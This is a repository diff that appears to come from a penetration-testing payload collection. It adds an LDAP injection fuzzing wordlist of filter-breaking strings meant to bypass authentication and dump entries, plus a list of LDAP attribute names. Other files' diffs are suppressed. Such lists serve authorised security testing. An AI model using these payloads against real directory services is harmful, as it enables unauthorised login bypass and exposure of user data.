
6479
Kubernetes/index.html Normal file
View File

File diff suppressed because one or more lines are too long

46
LDAP Injection/Intruder/LDAP_FUZZ.txt Normal file
View File

@ -0,0 +1,46 @@
*
*)(&
*))%00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
&
(
)
)(cn=))\x00
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
/
//
//*
@*
x' or name()='username' or 'x'='y
|
*()|&'
admin*
admin*)((|userpassword=*)
*)(uid=*))(|(uid=*

27
LDAP Injection/Intruder/LDAP_attributes.txt Normal file
View File

@ -0,0 +1,27 @@
c
cn
co
commonName
dc
facsimileTelephoneNumber
givenName
gn
homePhone
id
jpegPhoto
l
mail
mobile
name
o
objectClass
ou
owner
pager
password
sn
st
surname
uid
username
userPassword

6080
LDAP Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

21
LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2019 Swissky
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

5887
LaTeX Injection/index.html Normal file
View File

File diff suppressed because one or more lines are too long

Some files were not shown because too many files have changed in this diff Show More